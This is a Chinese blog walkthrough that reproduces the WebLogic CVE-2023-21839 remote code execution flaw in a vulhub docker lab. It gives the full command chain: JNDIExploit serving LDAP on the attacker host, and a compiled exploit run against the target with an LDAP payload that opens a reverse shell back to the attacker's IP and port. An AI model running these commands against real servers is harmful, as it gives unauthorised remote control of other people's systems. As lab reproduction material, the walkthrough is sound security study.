weblogic CVE-2023-21839详细复现

1、本次复现使用vulhub的靶场

切换到靶场的目录下,用docker -compose up -d启动靶场

使用docker-compose ps -a查看靶场的端口

2、访问开启的环境

3、准备工作都做好之后开始复现

(1)开启JNDIExploit

工具地址:GitHub - WhiteHSBG/JNDIExploit: 对原版https://github.com/feihong-cs/JNDIExploit 进行了实用化修改

使用工具JNDIExploit-1.3-SNAPSHOT.jar在kali上设置监听,开启ldap和http服务,这里我kali攻击机的java版本是java11

java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.10.130(ip地址为攻击机的ip地址)

(2)监听端口(用于接收反弹的shell)

(3)使用工具包

这里我使用的是这个:GitHub - ASkyeye/CVE-2023-21839: Weblogic CVE-2023-21839 RCE (无需Java依赖一键RCE)

需要用go语言编译一下,kali安装go语言环境可以csdn上查到

编译之后运行下面的命令:./CVE-2023-21839 -ip 192.168.10.133 -port 7001 -ldap ldap://192.168.10.130:1389/Basic/ReverseShell/192.168.10.130/9999,第一个ip是靶机的ip地址,第二个ip是攻击机kali的ip

(4)查看监听的端口

成功复现,记得关闭docker启动的镜像

关闭镜像

关闭容器

  • 6
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值